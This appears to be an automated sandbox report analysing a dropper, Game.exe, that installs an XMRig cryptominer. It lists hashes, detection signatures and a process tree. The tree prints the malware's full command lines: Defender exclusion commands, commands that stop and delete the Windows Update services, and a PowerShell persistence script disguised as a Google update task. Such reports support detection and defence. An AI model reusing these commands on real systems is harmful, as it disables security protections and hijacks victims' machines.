Resubmissions
23-02-2023 13:49
230223-q4zd9sga47 1001-02-2023 03:49
230201-edgwrabg38 1011-01-2023 14:44
230111-r37jxsdc66 10Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
01-02-2023 03:49
Static task
static1
Behavioral task
behavioral1
Sample
Game.exe
Resource
win7-20220812-en
General
-
Target
Game.exe
-
Size
5.4MB
-
MD5
2694829cbbbbae11c9739c44487fd7ad
-
SHA1
2af3e59940159d5bc37e75cb4060d677f3900799
-
SHA256
7c8394def968d283d507cbd4f23ca5d2cf348ffcbf5f72fa8262bca22852e104
-
SHA512
06102826af24db8556a0133a66da40da7853457413e334bc01fcd480413a96d3ca0d8273d766829b43c28dc380b3d53ff0528065402b077328736ec48d7067a0
-
SSDEEP
98304:NgggDCyOjwQrI5IaofNLCI4cMCU+lVIbNejBQWTW0efUVROTu9A2ez212d:elOyWNU9IUCZXqcuWTcfUV4a9leCi
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4104 332 rundll32.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
Processes:
Game_Graphics.exeupdater.execonhost.exedescription pid process target process PID 5072 created 744 5072 Game_Graphics.exe Explorer.EXE PID 5072 created 744 5072 Game_Graphics.exe Explorer.EXE PID 5072 created 744 5072 Game_Graphics.exe Explorer.EXE PID 5072 created 744 5072 Game_Graphics.exe Explorer.EXE PID 5072 created 744 5072 Game_Graphics.exe Explorer.EXE PID 1420 created 744 1420 updater.exe Explorer.EXE PID 1420 created 744 1420 updater.exe Explorer.EXE PID 1420 created 744 1420 updater.exe Explorer.EXE PID 1420 created 744 1420 updater.exe Explorer.EXE PID 1420 created 744 1420 updater.exe Explorer.EXE PID 3912 created 744 3912 conhost.exe Explorer.EXE PID 1420 created 744 1420 updater.exe Explorer.EXE PID 1420 created 744 1420 updater.exe Explorer.EXE -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/508-211-0x00007FF7E5120000-0x00007FF7E5914000-memory.dmp xmrig behavioral2/memory/508-215-0x00007FF7E5120000-0x00007FF7E5914000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
Game_Graphics.exeupdater.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts Game_Graphics.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Executes dropped EXE 5 IoCs
Processes:
Game_Graphics.exeResource.exeFolder.exeFolder.exeupdater.exepid process 5072 Game_Graphics.exe 1284 Resource.exe 840 Folder.exe 4484 Folder.exe 1420 updater.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral2/memory/508-211-0x00007FF7E5120000-0x00007FF7E5914000-memory.dmp upx behavioral2/memory/508-215-0x00007FF7E5120000-0x00007FF7E5914000-memory.dmp upx -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Resource.exe vmprotect C:\Users\Admin\AppData\Local\Temp\Resource.exe vmprotect behavioral2/memory/1284-141-0x0000000140000000-0x0000000140622000-memory.dmp vmprotect -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Game.exeFolder.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Game.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Folder.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 3468 rundll32.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 1420 set thread context of 3912 1420 updater.exe conhost.exe PID 1420 set thread context of 508 1420 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
Game_Graphics.exeupdater.execmd.execmd.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe Game_Graphics.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1504 sc.exe 4296 sc.exe 2856 sc.exe 4312 sc.exe 3504 sc.exe 508 sc.exe 3924 sc.exe 4024 sc.exe 3412 sc.exe 380 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1132 3468 WerFault.exe rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.execonhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 18 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Game_Graphics.exepowershell.exepowershell.exepowershell.exeupdater.exepowershell.exepowershell.execonhost.execonhost.exepid process 5072 Game_Graphics.exe 5072 Game_Graphics.exe 3692 powershell.exe 3692 powershell.exe 5072 Game_Graphics.exe 5072 Game_Graphics.exe 5072 Game_Graphics.exe 5072 Game_Graphics.exe 5072 Game_Graphics.exe 5072 Game_Graphics.exe 4424 powershell.exe 4424 powershell.exe 5072 Game_Graphics.exe 5072 Game_Graphics.exe 3932 powershell.exe 3932 powershell.exe 1420 updater.exe 1420 updater.exe 4888 powershell.exe 4888 powershell.exe 1420 updater.exe 1420 updater.exe 1420 updater.exe 1420 updater.exe 1420 updater.exe 1420 updater.exe 5112 powershell.exe 5112 powershell.exe 1420 updater.exe 1420 updater.exe 3912 conhost.exe 3912 conhost.exe 1420 updater.exe 1420 updater.exe 1420 updater.exe 1420 updater.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe 508 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 652 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 3692 powershell.exe Token: SeShutdownPrivilege 528 powercfg.exe Token: SeCreatePagefilePrivilege 528 powercfg.exe Token: SeDebugPrivilege 4424 powershell.exe Token: SeShutdownPrivilege 1876 powercfg.exe Token: SeCreatePagefilePrivilege 1876 powercfg.exe Token: SeShutdownPrivilege 4696 powercfg.exe Token: SeCreatePagefilePrivilege 4696 powercfg.exe Token: SeShutdownPrivilege 1600 powercfg.exe Token: SeCreatePagefilePrivilege 1600 powercfg.exe Token: SeIncreaseQuotaPrivilege 4424 powershell.exe Token: SeSecurityPrivilege 4424 powershell.exe Token: SeTakeOwnershipPrivilege 4424 powershell.exe Token: SeLoadDriverPrivilege 4424 powershell.exe Token: SeSystemProfilePrivilege 4424 powershell.exe Token: SeSystemtimePrivilege 4424 powershell.exe Token: SeProfSingleProcessPrivilege 4424 powershell.exe Token: SeIncBasePriorityPrivilege 4424 powershell.exe Token: SeCreatePagefilePrivilege 4424 powershell.exe Token: SeBackupPrivilege 4424 powershell.exe Token: SeRestorePrivilege 4424 powershell.exe Token: SeShutdownPrivilege 4424 powershell.exe Token: SeDebugPrivilege 4424 powershell.exe Token: SeSystemEnvironmentPrivilege 4424 powershell.exe Token: SeRemoteShutdownPrivilege 4424 powershell.exe Token: SeUndockPrivilege 4424 powershell.exe Token: SeManageVolumePrivilege 4424 powershell.exe Token: 33 4424 powershell.exe Token: 34 4424 powershell.exe Token: 35 4424 powershell.exe Token: 36 4424 powershell.exe Token: SeIncreaseQuotaPrivilege 4424 powershell.exe Token: SeSecurityPrivilege 4424 powershell.exe Token: SeTakeOwnershipPrivilege 4424 powershell.exe Token: SeLoadDriverPrivilege 4424 powershell.exe Token: SeSystemProfilePrivilege 4424 powershell.exe Token: SeSystemtimePrivilege 4424 powershell.exe Token: SeProfSingleProcessPrivilege 4424 powershell.exe Token: SeIncBasePriorityPrivilege 4424 powershell.exe Token: SeCreatePagefilePrivilege 4424 powershell.exe Token: SeBackupPrivilege 4424 powershell.exe Token: SeRestorePrivilege 4424 powershell.exe Token: SeShutdownPrivilege 4424 powershell.exe Token: SeDebugPrivilege 4424 powershell.exe Token: SeSystemEnvironmentPrivilege 4424 powershell.exe Token: SeRemoteShutdownPrivilege 4424 powershell.exe Token: SeUndockPrivilege 4424 powershell.exe Token: SeManageVolumePrivilege 4424 powershell.exe Token: 33 4424 powershell.exe Token: 34 4424 powershell.exe Token: 35 4424 powershell.exe Token: 36 4424 powershell.exe Token: SeIncreaseQuotaPrivilege 4424 powershell.exe Token: SeSecurityPrivilege 4424 powershell.exe Token: SeTakeOwnershipPrivilege 4424 powershell.exe Token: SeLoadDriverPrivilege 4424 powershell.exe Token: SeSystemProfilePrivilege 4424 powershell.exe Token: SeSystemtimePrivilege 4424 powershell.exe Token: SeProfSingleProcessPrivilege 4424 powershell.exe Token: SeIncBasePriorityPrivilege 4424 powershell.exe Token: SeCreatePagefilePrivilege 4424 powershell.exe Token: SeBackupPrivilege 4424 powershell.exe Token: SeRestorePrivilege 4424 powershell.exe Token: SeShutdownPrivilege 4424 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Game.exeFolder.exerundll32.execmd.execmd.exepowershell.execmd.execmd.exedescription pid process target process PID 2584 wrote to memory of 5072 2584 Game.exe Game_Graphics.exe PID 2584 wrote to memory of 5072 2584 Game.exe Game_Graphics.exe PID 2584 wrote to memory of 1284 2584 Game.exe Resource.exe PID 2584 wrote to memory of 1284 2584 Game.exe Resource.exe PID 2584 wrote to memory of 840 2584 Game.exe Folder.exe PID 2584 wrote to memory of 840 2584 Game.exe Folder.exe PID 2584 wrote to memory of 840 2584 Game.exe Folder.exe PID 840 wrote to memory of 4484 840 Folder.exe Folder.exe PID 840 wrote to memory of 4484 840 Folder.exe Folder.exe PID 840 wrote to memory of 4484 840 Folder.exe Folder.exe PID 4104 wrote to memory of 3468 4104 rundll32.exe rundll32.exe PID 4104 wrote to memory of 3468 4104 rundll32.exe rundll32.exe PID 4104 wrote to memory of 3468 4104 rundll32.exe rundll32.exe PID 4868 wrote to memory of 508 4868 cmd.exe sc.exe PID 4868 wrote to memory of 508 4868 cmd.exe sc.exe PID 4384 wrote to memory of 528 4384 cmd.exe powercfg.exe PID 4384 wrote to memory of 528 4384 cmd.exe powercfg.exe PID 4384 wrote to memory of 1876 4384 cmd.exe powercfg.exe PID 4384 wrote to memory of 1876 4384 cmd.exe powercfg.exe PID 4868 wrote to memory of 3924 4868 cmd.exe sc.exe PID 4868 wrote to memory of 3924 4868 cmd.exe sc.exe PID 4384 wrote to memory of 4696 4384 cmd.exe powercfg.exe PID 4384 wrote to memory of 4696 4384 cmd.exe powercfg.exe PID 4868 wrote to memory of 4024 4868 cmd.exe sc.exe PID 4868 wrote to memory of 4024 4868 cmd.exe sc.exe PID 4384 wrote to memory of 1600 4384 cmd.exe powercfg.exe PID 4384 wrote to memory of 1600 4384 cmd.exe powercfg.exe PID 4868 wrote to memory of 3412 4868 cmd.exe sc.exe PID 4868 wrote to memory of 3412 4868 cmd.exe sc.exe PID 4868 wrote to memory of 380 4868 cmd.exe sc.exe PID 4868 wrote to memory of 380 4868 cmd.exe sc.exe PID 4868 wrote to memory of 1416 4868 cmd.exe reg.exe PID 4868 wrote to memory of 1416 4868 cmd.exe reg.exe PID 4868 wrote to memory of 4772 4868 cmd.exe reg.exe PID 4868 wrote to memory of 4772 4868 cmd.exe reg.exe PID 4868 wrote to memory of 4548 4868 cmd.exe reg.exe PID 4868 wrote to memory of 4548 4868 cmd.exe reg.exe PID 4868 wrote to memory of 2720 4868 cmd.exe reg.exe PID 4868 wrote to memory of 2720 4868 cmd.exe reg.exe PID 4868 wrote to memory of 752 4868 cmd.exe reg.exe PID 4868 wrote to memory of 752 4868 cmd.exe reg.exe PID 3932 wrote to memory of 1992 3932 powershell.exe schtasks.exe PID 3932 wrote to memory of 1992 3932 powershell.exe schtasks.exe PID 2088 wrote to memory of 1504 2088 cmd.exe sc.exe PID 2088 wrote to memory of 1504 2088 cmd.exe sc.exe PID 2152 wrote to memory of 1456 2152 cmd.exe powercfg.exe PID 2152 wrote to memory of 1456 2152 cmd.exe powercfg.exe PID 2088 wrote to memory of 2856 2088 cmd.exe sc.exe PID 2088 wrote to memory of 2856 2088 cmd.exe sc.exe PID 2088 wrote to memory of 4296 2088 cmd.exe sc.exe PID 2088 wrote to memory of 4296 2088 cmd.exe sc.exe PID 2152 wrote to memory of 4508 2152 cmd.exe powercfg.exe PID 2152 wrote to memory of 4508 2152 cmd.exe powercfg.exe PID 2088 wrote to memory of 4312 2088 cmd.exe sc.exe PID 2088 wrote to memory of 4312 2088 cmd.exe sc.exe PID 2152 wrote to memory of 3308 2152 cmd.exe powercfg.exe PID 2152 wrote to memory of 3308 2152 cmd.exe powercfg.exe PID 2088 wrote to memory of 3504 2088 cmd.exe sc.exe PID 2088 wrote to memory of 3504 2088 cmd.exe sc.exe PID 2152 wrote to memory of 5056 2152 cmd.exe powercfg.exe PID 2152 wrote to memory of 5056 2152 cmd.exe powercfg.exe PID 2088 wrote to memory of 2356 2088 cmd.exe reg.exe PID 2088 wrote to memory of 2356 2088 cmd.exe reg.exe PID 2088 wrote to memory of 100 2088 cmd.exe reg.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:744
-
C:\Users\Admin\AppData\Local\Temp\Game.exe"C:\Users\Admin\AppData\Local\Temp\Game.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Users\Admin\AppData\Local\Temp\Game_Graphics.exe"C:\Users\Admin\AppData\Local\Temp\Game_Graphics.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:5072 -
C:\Users\Admin\AppData\Local\Temp\Resource.exe"C:\Users\Admin\AppData\Local\Temp\Resource.exe"3⤵
- Executes dropped EXE
PID:1284 -
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -h4⤵
- Executes dropped EXE
PID:4484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3692 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:528 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1876 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4696 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1600 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:508 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3924 -
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4024 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3412 -
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:380 -
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1416
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:4772
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:4548 -
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:2720
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#swohxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4424 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#unthfrtyg#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:1992
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4888 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1504 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2856 -
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4296 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4312 -
